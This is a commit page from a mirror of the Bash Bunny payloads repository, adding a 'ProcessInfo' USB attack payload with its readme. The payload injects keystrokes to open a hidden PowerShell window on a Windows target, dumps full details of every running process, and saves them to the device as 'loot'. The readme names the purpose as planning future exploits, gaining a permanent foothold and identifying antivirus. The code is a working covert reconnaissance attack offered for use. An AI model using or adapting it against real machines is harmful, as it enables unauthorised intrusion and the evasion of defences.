weyne/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5darren/bashbunny-payloads.git synced 2025-10-29 16:58:12 +00:00
Code Issues Packages Projects Releases Wiki Activity

Added BruteBunny and ProcessInfo payloads (#140)

Browse Source
This commit is contained in:
DeeKoy
2017-04-07 01:01:37 -04:00
committed by Sebastian Kinne
parent fc1d812d96
commit 945b5c14d9
7 changed files with 240 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

41
payloads/library/ProcessInfo/payload.txt Normal file
View File

@@ -0,0 +1,41 @@
#!/bin/bash
#
# Title: Process Info
# Author: Decoy
# Version: 1.0
# Category: Recon
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, Storage
#
#
# Amber Blink Fast.....Initialization
# Amber................Begin
# White Blinking... ...Moving loot to mass storage
# Blue Blinking........Syncing File System
# Green................Finished
# Initialization
LED R G 100
# Create loot directory
mkdir -p /root/udisk/loot/ProcessInfo
# Runs minimized powershell gathering process information for potential future attack vectors
LED R G
ATTACKMODE HID STORAGE
QUACK DELAY 6000
QUACK GUI r
QUACK STRING "powershell -NoP -NonI -W Hidden"
QUACK ENTER
QUCK DELAY 1000
QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
QUACK ENTER
LED R G B 100
sleep 3
# Sync File System
LED B 100
sync; sleep 1; sync
# Trap is clean
LED G

30
payloads/library/ProcessInfo/readme.md Normal file
View File

@@ -0,0 +1,30 @@
# Process Info for Bash Bunny
* Author: Decoy
* Version: Version 1.0
* Target: Windows
## Description
This is just a quick and dirty payload to return all running processes under the current user.
This will return the path/filename/version, and quite a bit of other info as well. This information
can be useful for planning future attacks, such as taking advantage of buffer overflows, and other
various vulnerabilities to gain a more permanent foothold into a target system. It can also be
useful in identifying what AV is in use on a target system.
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber (blinking) | Setting up |
| Amber | Attack running |
| White (blinking) | Moving loot to mass storage |
| Blue (blinking) | Syncing File System |
| Green | Trap is clean |
## Discussion
https://forums.hak5.org/index.php?/topic/40605-payload-process-info/